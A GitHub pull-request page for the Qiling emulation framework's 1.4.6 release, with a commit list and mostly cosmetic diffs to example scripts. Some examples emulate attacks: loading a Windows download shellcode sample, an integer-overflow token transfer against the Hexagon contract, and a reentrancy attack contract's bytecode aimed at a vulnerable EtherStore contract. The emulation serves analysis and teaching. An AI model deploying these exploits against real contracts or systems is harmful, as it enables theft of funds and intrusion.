Skip to content

Getting ready for 1.4.6 #1368

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
xwings merged 117 commits into from
Aug 4, 2023
Merged

Getting ready for 1.4.6 #1368

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
117 commits
Select commit Hold shift + click to select a range
09562f6
to 1.4.6-dev
xwings Dec 31, 2022
e539e8b
Update ChangeLog
xwings Dec 31, 2022
8240471
Fix ELF argv encoding
elicn Jan 8, 2023
298d7b4
Merge pull request #1303 from elicn/fix-argv
kabeor Jan 15, 2023
fe91fe6
Update CREDITS.md
xwings Jan 18, 2023
3cc980e
added a pipe that can be used when a user wants to run the emulation,…
Jan 23, 2023
da46fbe
clarified documentation
Jan 23, 2023
1602bc0
forgot to type hint the return value
Jan 23, 2023
b4d54fe
partially fixed kernel32.dll$_CreateFile function
Feb 6, 2023
b60eaba
fixed issue with Write only, Truncate + Create new
Feb 6, 2023
f2b3209
fix error if access mask is invalid
Feb 6, 2023
c23abeb
show invalid instruction now
ucgJhe Feb 7, 2023
775bc69
pause at program exit point, now step command accepts argument
ucgJhe Feb 7, 2023
c19fcf1
added a history tracker to get coverage information about the executi…
Feb 16, 2023
ffc3a46
updated some values to be in hex, removed some code that was just use…
Feb 16, 2023
9d2069e
Merge pull request #1313 from anotherdish/feature/improve-coverage-in…
xwings Feb 24, 2023
a08ef1f
remove tab and replace with 4 space
xwings Feb 28, 2023
368cae3
remove orig fiesl
xwings Feb 28, 2023
87c79e6
Merge pull request #1320 from xwings/dev
xwings Feb 28, 2023
2f5ae46
Merge pull request #1309 from kbsec/dev
xwings Feb 28, 2023
87ae716
Merge pull request #1307 from anotherdish/feature/add-interactive-pipe
xwings Feb 28, 2023
82d5c68
Introduce emu_state core property
elicn Mar 3, 2023
bbd8f7e
Remove the PE_RUN property
elicn Mar 3, 2023
5ca0764
Fix #1310
elicn Mar 3, 2023
1a0df1e
Opportunistic PEP8 fixes
elicn Mar 3, 2023
997be39
fix #1325
DiamondHunters Mar 11, 2023
9eaf559
added tests to assert history has length, and to test the case where …
Feb 24, 2023
f2aac3c
fixed issue where the get_ins_exclude_lib wasnt handling filters for …
Feb 24, 2023
3f67544
brought back the list comprehension (thanks @elicn) and reimplemented…
Feb 28, 2023
8fbbfb8
made more changes as per the comments in PR 1317
Mar 6, 2023
de4e38b
added the __future__ annotations so i dont have to use quotes for the…
Mar 6, 2023
2952989
added some more type annotations, added a new callback specifically f…
Mar 6, 2023
2a78192
cleaned up some pylint stuff, consolidated the arm and other arch blo…
Mar 7, 2023
254d982
commenting on why we have this arm handler in the __hook_block
Mar 7, 2023
4c9e6b5
removing "*context" argument from history tracker callback
Mar 7, 2023
489c3b6
Delete plugin object before reloading custom_script
DiamondHunters Mar 17, 2023
b3293e1
Merge pull request #1322 from elicn/fix-gdb-stop
xwings Mar 21, 2023
b667054
Merge pull request #1327 from DiamondHunters/qilingida
xwings Mar 29, 2023
e2b0e4d
Merge pull request #1326 from DiamondHunters/patch-1
xwings Mar 29, 2023
c006864
Remove unnecessary property elf_emu_start
elicn Mar 10, 2023
28e1f33
Fix unsafe ELF interpreter loading
elicn Mar 10, 2023
f6200ac
Fix wrapper decoration
elicn Mar 10, 2023
4b4ed62
Reduce module dependencies
elicn Mar 10, 2023
b9f61a9
Have gdbserver report back Uc errors
elicn Mar 10, 2023
c89b43a
Opportunistic PEP8 fixes
elicn Mar 10, 2023
c67a64e
Properly load QNS profile values
elicn Mar 10, 2023
5e9738c
Minor code rearrangements in gdb
elicn Mar 10, 2023
f58c494
Revamp FS mapper
elicn Mar 27, 2023
263d523
Revamp POSIX fcntl
elicn Mar 27, 2023
5aedbaf
Fix close_on_exec type
elicn Mar 27, 2023
8261039
Avoid overwriting custom procfs mappings
elicn Mar 30, 2023
b8c78c6
Turned close_on_exec into a simple member
elicn Mar 30, 2023
0fd6209
Added closed property to ql_file
elicn Mar 30, 2023
056969f
Patched unistd functions
elicn Mar 30, 2023
0be4620
Patched fcntl functions
elicn Mar 30, 2023
2430578
Patched some stat functions
elicn Mar 30, 2023
63c92f1
Fix a bug in FindFirstFileA
elicn Mar 30, 2023
629454f
Re-implemented POSIX shm syscalls
elicn Apr 2, 2023
e76b8ab
Partialy implemented POSIX IPC syscall
elicn Apr 2, 2023
2347a9b
Adjust ELF shellcode tests
elicn Apr 3, 2023
3266680
Allow shellcode execve fail gracefully
elicn Apr 3, 2023
d9ff19d
Patch POSIX execve
elicn Apr 3, 2023
b3de208
Prevent emulation from closing host std streams
elicn Apr 3, 2023
32a8588
Insignificant styling and typo fixes
elicn Apr 3, 2023
48cc58d
Properly set emu_state
elicn Apr 4, 2023
c069a10
Collect new vcruntime140 DLLs
elicn Apr 4, 2023
412bcaf
Use yaml safe loader
elicn Apr 4, 2023
85430f0
Use mmap min address for shm allocations
elicn Apr 7, 2023
06cd3f0
Typo bugfix
elicn Apr 7, 2023
88a76a2
Fix struct packing logic associated with calls to getdents64.
Apr 1, 2023
ba7414a
Improve afl_fuzz wrapper
kiddo-pwn Mar 29, 2023
bb0c5f3
Update fuzzing sample due to changes in fuzz wrapper
kiddo-pwn Mar 30, 2023
0dd8545
Re-implement POSIX shm
elicn Apr 13, 2023
817bdb7
Add POSIX shmdt syscall
elicn Apr 13, 2023
a95b22b
Make argv and code mutually exclusive
elicn Apr 14, 2023
609ea31
Opportunistic PEP8 fixes
elicn Apr 14, 2023
717899b
Decouple runtime dependencies
elicn Apr 14, 2023
ace56d8
Rearrange and fix ELF MT test suite
elicn Apr 16, 2023
073950a
Fix bugs in IPv6 socket impl
elicn Apr 23, 2023
062bb57
Remove unused log colors
elicn Apr 28, 2023
26e4786
Switch back to default color instead reset entirely
elicn Apr 28, 2023
45056c9
Adhere to the NO_COLOR convention
elicn Apr 28, 2023
8a364a5
Slightly optimize logging for speed
elicn Apr 28, 2023
4c53a43
Handle fds that lack the close_on_exec property
elicn Apr 28, 2023
97002fe
Merge pull request #1336 from elicn/dev-improv
xwings May 10, 2023
5db7c5c
Make sure dllscollector script is ran with admin privs
elicn May 24, 2023
1947e1c
Patch string utils to allow specifying maxlength
elicn May 24, 2023
26c2aa4
Fix PANSI_STRING and PUNICODE_STRING handling
elicn May 24, 2023
734e230
Properly report unsupported arch_prctl code values
elicn May 24, 2023
cf61fe6
Correct x86 segment selector and descriptor bits
elicn May 24, 2023
3bd774e
Support the case of a zero size ELF region
elicn May 28, 2023
2ce9ff5
Fix Windows SetInformationProcess
elicn May 28, 2023
0617213
Add qltui.py
river-li May 29, 2023
df329e8
Fix typo
elicn May 29, 2023
86b8b6f
Add tracing example
elicn May 29, 2023
1706049
Merge pull request #1354 from river-li/dev
kabeor May 29, 2023
9a64573
fixed bugs in export table and GetProcAddress
clairelevin Jun 1, 2023
41b3b83
added comment for export table fix
clairelevin Jun 5, 2023
38a8622
archtype and ostype no longer support string values
elicn Jun 16, 2023
4860f95
Opportunistic PEP8 fixes
elicn Jun 17, 2023
a9233b5
Speed up ARM assembler and disassembler access
elicn Jun 19, 2023
7ef734d
feat(os): add posix message queue syscalls
chinggg Jun 21, 2023
526a1b0
Rename and revamp netgear 6220 example
elicn Jun 28, 2023
d1accb9
Revamp IDA custom script
elicn Jun 28, 2023
c85f592
Revamp Tenda AC15 example
elicn Jun 28, 2023
88c69eb
Make progress animation more robust
elicn Jul 3, 2023
260aad7
Some more opportunistic PEP8 fixes
elicn Jul 3, 2023
28ae2c8
Update msg.py
elicn Jul 3, 2023
29f9326
Update syscall.py
elicn Jul 3, 2023
6011be1
Update msg.py
elicn Jul 3, 2023
83bcbbf
Merge pull request #1363 from chinggg/ipc-msg
xwings Jul 4, 2023
7d28532
Merge pull request #1358 from clairelevin/bugfix
kabeor Jul 4, 2023
930da79
Fix bug: qdb executes from the entry point of the binary when using…
ltlly Jul 6, 2023
f456d07
Merge pull request #1355 from elicn/periodic
xwings Jul 13, 2023
ca62670
update return register accordingly
ucgJhe Jul 28, 2023
729360e
prepare for 1.4.6
xwings Aug 4, 2023
1a92844
Merge pull request #1367 from ucgJhe/dev
xwings Aug 4, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions CREDITS.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -18,6 +18,7 @@
- KONG ziqiao (lazymio) <mio_at_lazym_io>
- YU zheng (dataisland) <dataisland_at_outlook_com>
- Eli Cohen Nehemia (elicn) <elichn_at_gmail_com>
- Li Hong Jhe (ucgJhe) <ucg.jhe_at_gamil_com>


#### CI, Website,Documentations, Logo & Swags
Expand Down
3 changes: 1 addition & 2 deletions ChangeLog
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
This file details the changelog of Qiling Framework.

------------------------------------
[Version 1.4.5]: December 29th, 2022
[Version 1.4.5]: December 31st, 2022

New features:
- Qdb with PE (#1295)
Expand Down Expand Up @@ -41,7 +41,6 @@ Contributors:
- ucgJhe
- aquynh
- owl129
-

------------------------------------
[Version 1.4.4]: September 24th, 2022
Expand Down
7 changes: 4 additions & 3 deletions examples/adcache_x86_windows_debug.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -3,17 +3,18 @@
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

from zipfile import ZipFile

import sys
sys.path.append("..")

from zipfile import ZipFile
from qiling import Qiling
from qiling.const import QL_VERBOSE
from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE

if __name__ == "__main__":
with ZipFile("shellcodes/win32_https_download.zip") as zip_reader:
with zip_reader.open('win32_https_download.bin', 'r', b'infected') as f:
sc = f.read()

ql = Qiling(code=sc, archtype="x86", ostype="windows", rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG)
ql = Qiling(code=sc, archtype=QL_ARCH.X86, ostype=QL_OS.WINDOWS, rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG)
ql.run()
28 changes: 17 additions & 11 deletions examples/doogie_8086_crack.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,15 +1,22 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

import sys, curses, math, struct, string, time
import curses
import math
import string
import time

from struct import pack

import sys
sys.path.append("..")
from qiling import *

from qiling import Qiling
from qiling.const import *
from qiling.os.disk import QlDisk
from qiling.os.dos.utils import BIN2BCD
from struct import pack


# https://stackoverflow.com/questions/9829578/fast-way-of-counting-non-zero-bits-in-positive-integer
Expand Down Expand Up @@ -129,9 +136,7 @@ def show_once(ql: Qiling, key):
# In this stage, we show every key.
def third_stage(keys):
# To setup terminal again, we have to restart the whole program.
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"],
"rootfs/8086",
console=False)
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], "rootfs/8086", console=False)
ql.add_fs_mapper(0x80, QlDisk("rootfs/8086/doogie/doogie.DOS_MBR", 0x80))
ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)
hk = ql.hook_code(stop, begin=0x8018, end=0x8018)
Expand Down Expand Up @@ -170,21 +175,22 @@ def read_until_zero(ql: Qiling, addr):
addr += 1
return buf


def set_required_datetime(ql: Qiling):
ql.log.info("Setting Feburary 06, 1990")
ql.arch.regs.ch = BIN2BCD(19)
ql.arch.regs.cl = BIN2BCD(1990%100)
ql.arch.regs.cl = BIN2BCD(1990 % 100)
ql.arch.regs.dh = BIN2BCD(2)
ql.arch.regs.dl = BIN2BCD(6)


def stop(ql, addr, data):
ql.emu_stop()


# In this stage, we get the encrypted data which xored with the specific date.
def first_stage():
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"],
"rootfs/8086",
console=False)
ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], "rootfs/8086", console=False)
ql.add_fs_mapper(0x80, QlDisk("rootfs/8086/doogie/doogie.DOS_MBR", 0x80))
# Doogie suggests that the datetime should be 1990-02-06.
ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)
Expand Down
17 changes: 10 additions & 7 deletions examples/evm/evm_Hexagon_overflow.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,20 +1,21 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

# https://etherscan.io/tx/0x9243d45ca81db4f16a0ded3e57982b4bc95ec32ce69d541bf6e019d949cbc6c8
# https://www.anquanke.com/post/id/145520

import sys

sys.path.append("../..")
from qiling import *

from qiling import Qiling
from qiling.const import QL_ARCH


def example_run_evm():
contract = '0x606060405266017dfcdece4000600055341561001a57600080fd5b600160a060020a033316600090815260016020526040902066017dfcdece400090556106eb8061004b6000396000f3006060604052600436106100c45763ffffffff7c010000000000000000000000000000000000000000000000000000000060003504166306fdde0381146100c9578063095ea7b31461015357806318160ddd1461018957806323b872dd146101ae57806327edf097146101d6578063313ce567146101ff578063378dc3dc1461021257806342966c681461022557806370a082311461023b578063771282f61461025a57806395d89b411461026d578063a9059cbb14610280578063dd62ed3e146102a2575b600080fd5b34156100d457600080fd5b6100dc6102c7565b60405160208082528190810183818151815260200191508051906020019080838360005b83811015610118578082015183820152602001610100565b50505050905090810190601f1680156101455780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b341561015e57600080fd5b610175600160a060020a03600435166024356102fe565b604051901515815260200160405180910390f35b341561019457600080fd5b61019c6103a4565b60405190815260200160405180910390f35b34156101b957600080fd5b610175600160a060020a03600435811690602435166044356103aa565b34156101e157600080fd5b6101e9610422565b60405160ff909116815260200160405180910390f35b341561020a57600080fd5b6101e9610427565b341561021d57600080fd5b61019c61042c565b341561023057600080fd5b610175600435610437565b341561024657600080fd5b61019c600160a060020a03600435166104ea565b341561026557600080fd5b61019c6104fc565b341561027857600080fd5b6100dc610502565b341561028b57600080fd5b610175600160a060020a0360043516602435610539565b34156102ad57600080fd5b61019c600160a060020a036004358116906024351661054f565b60408051908101604052600781527f48657861676f6e00000000000000000000000000000000000000000000000000602082015281565b60008115806103305750600160a060020a03338116600090815260026020908152604080832093871683529290522054155b151561033b57600080fd5b600160a060020a03338116600081815260026020908152604080832094881680845294909152908190208590557f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259085905190815260200160405180910390a350600192915050565b60005490565b600160a060020a03808416600090815260026020908152604080832033909416835292905290812054829010156103e057600080fd5b600160a060020a038085166000908152600260209081526040808320339094168352929052208054839003905561041884848461056c565b5060019392505050565b600281565b600481565b66017dfcdece400081565b600160a060020a0333166000908152600160205260408120548290101561045d57600080fd5b600160a060020a033316600081815260016020526040808220805486900390558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980548601905581548590039091557fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca59084905190815260200160405180910390a2506001919050565b60016020526000908152604090205481565b60005481565b60408051908101604052600381527f4858470000000000000000000000000000000000000000000000000000000000602082015281565b600061054633848461056c565b50600192915050565b600260209081526000928352604080842090915290825290205481565b600160a060020a038216151561058157600080fd5b600160a060020a038316600090815260016020526040902054600282019010156105aa57600080fd5b600160a060020a038216600090815260016020526040902054818101116105d057600080fd5b600160a060020a03808416600081815260016020526040808220805460011990879003810190915593861682528082208054860190558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980546002908101909155825490940190915590917fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5915160ff909116815260200160405180910390a281600160a060020a031683600160a060020a03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405190815260200160405180910390a35050505600a165627a7a72305820fbef5b10322242b8659b5de8e24ec1cf5e809831f6f7c08e52112f76daa31aef0029'
ql = Qiling(code=contract, archtype="evm")
ql = Qiling(code=contract, archtype=QL_ARCH.EVM)

user1 = ql.arch.evm.create_account(balance=100*10**18)
user2 = ql.arch.evm.create_account(balance=100*10**18)
Expand All @@ -36,9 +37,10 @@ def check_balance(sender, destination):
# # SMART CONTRACT DEPENDENT: transform from user1 to user2
call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \
ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
result = ql.run(code=msg1)
if int(result.output.hex()[2:], 16) == 1:

if int(result.output.hex()[2:], 16) == 1:
print('User1 transfered Token to User1')

# # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1
Expand All @@ -48,5 +50,6 @@ def check_balance(sender, destination):
result = check_balance(user2, c1)
print('User2 final balance =', int(result.output.hex()[2:], 16))


if __name__ == "__main__":
example_run_evm()
example_run_evm()
10 changes: 6 additions & 4 deletions examples/evm/evm_debugger.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,16 +1,18 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

import sys

sys.path.append("../..")
from qiling import *

from qiling import Qiling
from qiling.const import QL_ARCH


if __name__ == '__main__':
contract = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029'
ql = Qiling(code=contract, archtype="evm")
ql = Qiling(code=contract, archtype=QL_ARCH.EVM)
ql.debugger = True

# Add Balance Var to the contract
Expand Down
15 changes: 8 additions & 7 deletions examples/evm/evm_reentrancy.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,22 +1,23 @@
#!/usr/bin/env python3
#
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
#

import sys

sys.path.append("../..")
from qiling import *

from qiling import Qiling
from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
from qiling.arch.evm.vm.vm import BaseVM
from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
from qiling.const import QL_ARCH


if __name__ == '__main__':
# Attack_contract = '0x608060405234801561001057600080fd5b5060405160208061046d83398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506103ea806100836000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680636289d38514610152578063acd2e6e51461015c578063ff11e1db146101b3575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610150576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561013757600080fd5b505af115801561014b573d6000803e3d6000fd5b505050505b005b61015a6101ca565b005b34801561016857600080fd5b50610171610339565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156101bf57600080fd5b506101c861035e565b005b670de0b6b3a764000034101515156101e157600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e2c41dbc670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b15801561026e57600080fd5b505af1158015610282573d6000803e3d6000fd5b50505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561031f57600080fd5b505af1158015610333573d6000803e3d6000fd5b50505050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156103bb573d6000803e3d6000fd5b505600a165627a7a723058204ad3139b1085c12112b76e9eab70c6589942d6e84eb3d8329a644eca757c19d00029'
Attack_contract = '0x608060405234801561001057600080fd5b506040516020806104b883398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610435806100836000396000f30060806040526004361061004c576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063a75e462514610179578063ff11e1db146101e1575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610177576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600060149054906101000a90047c0100000000000000000000000000000000000000000000000000000000027c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505b005b6101df60048036038101908080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916906020019092919080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191690602001909291905050506101f8565b005b3480156101ed57600080fd5b506101f66103a9565b005b80600060146101000a81548163ffffffff02191690837c010000000000000000000000000000000000000000000000000000000090040217905550670de0b6b3a7640000341015151561024a57600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16670de0b6b3a7640000837c01000000000000000000000000000000000000000000000000000000009004906040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040160006040518083038185885af19350505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16817c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505050565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f19350505050158015610406573d6000803e3d6000fd5b505600a165627a7a723058205aacb19a5864d2c460aed6c844f2aca575d87de6477ac757a72511bb2975b3f80029'

ql = Qiling(code=Attack_contract, archtype="evm")
ql = Qiling(code=Attack_contract, archtype=QL_ARCH.EVM)
vm:BaseVM = ql.arch.evm.vm

C1 = b'\xaa' * 20
Expand All @@ -28,9 +29,9 @@
ql.arch.evm.create_account(C2)
ql.arch.evm.create_account(User1, 100*10**18)
ql.arch.evm.create_account(User2, 100*10**18)

EtherStore_contract = '0x6080604052670de0b6b3a764000060005534801561001c57600080fd5b506103b08061002c6000396000f30060806040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631031ec3114610072578063155dd5ee146100c957806327e235e3146100f65780637ddfe78d1461014d578063e2c41dbc14610178575b600080fd5b34801561007e57600080fd5b506100b3600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610182565b6040518082815260200191505060405180910390f35b3480156100d557600080fd5b506100f46004803603810190808035906020019092919050505061019a565b005b34801561010257600080fd5b50610137600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610317565b6040518082815260200191505060405180910390f35b34801561015957600080fd5b5061016261032f565b6040518082815260200191505060405180910390f35b610180610335565b005b60016020528060005260406000206000915090505481565b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101515156101e857600080fd5b60005481111515156101f957600080fd5b62093a80600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401421015151561024c57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185875af192505050151561028357600080fd5b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555042600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60026020528060005260406000206000915090505481565b60005481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505600a165627a7a72305820707bf0ae11ce52ff7b7846ede3497d41b6fadea29579773fc70e8e61c0f549f10029'

print('Init Victim balance is', vm.state.get_balance(User1)/10**18)
print('Init Attacker balance is', vm.state.get_balance(User2)/10**18)

Expand Down Expand Up @@ -66,7 +67,7 @@
res_code = bytecode_to_bytes(res.output)
runtime_code, aux_data, constructor_args = runtime_code_detector(res_code)
rt_code1 = bytecode_to_bytes(runtime_code)

print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
# 4. User2 pwnEtherStore with 1ETH
call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])
Expand Down
Loading